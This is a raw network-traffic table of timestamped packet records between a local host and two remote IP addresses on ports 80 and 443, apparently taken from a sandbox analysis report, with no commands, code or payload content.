Sep 27, 2024 01:38:21.049608946 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.049629927 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.049654007 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.049669981 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.049679995 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.049686909 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.049701929 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.049712896 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.049717903 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.049737930 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.050009966 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050024986 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050040007 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050055981 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050060987 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.050080061 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.050120115 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050134897 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050151110 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050167084 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050170898 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.050267935 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050296068 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.050296068 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050308943 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.050312996 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050388098 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050422907 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050426006 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.050438881 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050458908 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.050498009 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050512075 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050528049 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050548077 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.050571918 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.050633907 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050684929 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.050797939 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.052341938 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.052356005 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.052403927 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.150734901 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.150795937 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.150810003 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.150825977 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.150840998 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.150856018 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.150857925 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.150872946 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.150887012 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.150887966 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.150926113 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.150926113 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.150978088 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151052952 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151067972 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151082039 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151093960 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.151114941 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.151177883 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151194096 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151211023 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151247025 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.151273012 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151288033 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151304960 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151319027 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151324034 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.151412010 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.151550055 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151566029 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151580095 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151586056 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.151612997 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.151634932 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151658058 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151673079 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151695967 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.151737928 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151752949 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.151782990 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.200989962 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.240899086 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.240930080 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.240943909 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.240958929 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.240973949 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.240982056 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.240993023 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241009951 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241012096 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.241036892 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241044044 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.241053104 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241066933 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.241070032 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241086006 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241105080 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.241300106 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241322041 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241337061 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241338968 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.241353035 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241367102 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241378069 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.241381884 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241398096 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241415977 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.241440058 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.241672039 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241688967 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241703987 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241725922 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241736889 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.241741896 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241756916 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241760969 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.241772890 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241786957 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241794109 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.241810083 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.241822004 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.243019104 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.243031979 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.243072033 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.331320047 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331367970 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331433058 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.331445932 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331497908 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331532001 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331564903 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331583977 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.331599951 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331644058 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.331650972 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331685066 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331695080 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.331737995 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331770897 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331780910 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.331804991 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331839085 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331871033 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331887960 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.331913948 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.331921101 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331957102 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331990004 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.331998110 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.332030058 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.332079887 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.332079887 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.332130909 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.332160950 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.332192898 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.332206964 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.332227945 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.332261086 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.332272053 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.332297087 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.332298994 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.332346916 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.332380056 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.332391977 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.332416058 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.332458973 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.333164930 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.333215952 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.333283901 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.421168089 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421205997 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421257019 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421276093 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.421298027 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421333075 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421385050 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421386957 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.421425104 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421438932 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.421461105 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421493053 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421508074 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.421526909 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421576977 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.421581984 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421618938 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421713114 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.421735048 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421766996 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421798944 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421830893 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421858072 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.421864033 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421888113 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.421897888 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421933889 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.421984911 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.421999931 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.422054052 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.422081947 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.422106028 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.422115088 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.422127008 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.422167063 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.422199011 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.422219038 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.422313929 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.422347069 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.422379017 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.422410965 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.422410965 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.422437906 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.422446012 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.422493935 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.423451900 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.423501968 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.424180031 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.440294981 CEST	443	49748	188.114.97.3	192.168.2.7
Sep 27, 2024 01:38:21.440376997 CEST	49748	443	192.168.2.7	188.114.97.3
Sep 27, 2024 01:38:21.441935062 CEST	49748	443	192.168.2.7	188.114.97.3
Sep 27, 2024 01:38:21.441947937 CEST	443	49748	188.114.97.3	192.168.2.7
Sep 27, 2024 01:38:21.442200899 CEST	443	49748	188.114.97.3	192.168.2.7
Sep 27, 2024 01:38:21.443731070 CEST	49748	443	192.168.2.7	188.114.97.3
Sep 27, 2024 01:38:21.443753004 CEST	49748	443	192.168.2.7	188.114.97.3
Sep 27, 2024 01:38:21.443803072 CEST	443	49748	188.114.97.3	192.168.2.7
Sep 27, 2024 01:38:21.510993004 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511037111 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511090040 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511120081 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511137962 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.511173964 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511187077 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.511224985 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511257887 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511279106 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.511293888 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511327028 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511359930 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511379004 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.511420012 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.511428118 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511480093 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511528015 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511560917 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511579990 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.511595011 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511622906 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.511631012 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511671066 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511701107 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.511703968 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511737108 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511766911 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.511770010 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511806011 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511820078 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.511838913 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511872053 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511919022 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511929989 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.511970043 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.511989117 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.512022972 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.512070894 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.512070894 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.512120962 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.512152910 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.512170076 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.512186050 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.512221098 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.512254953 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.512270927 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.512305021 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.512337923 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.512356997 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.512377024 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.512382030 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.564172029 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.600977898 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601001024 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601017952 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601033926 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601070881 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.601100922 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601109982 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.601176977 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601191998 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601217031 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601219893 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.601234913 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601250887 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601283073 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.601330042 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.601361990 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601380110 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601396084 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601412058 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601424932 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.601445913 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.601675034 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601728916 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601759911 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601793051 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601815939 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.601828098 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601845026 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.601865053 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601898909 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601929903 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.601929903 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.601964951 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.602021933 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.602030993 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.602085114 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.602097988 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.602139950 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.602169037 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.602227926 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.602242947 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.602277040 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.602292061 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.602348089 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.602377892 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.602427959 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.602432966 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.602479935 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.602514029 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.602535963 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.602547884 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.602556944 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.602600098 CEST	80	49743	147.45.44.104	192.168.2.7
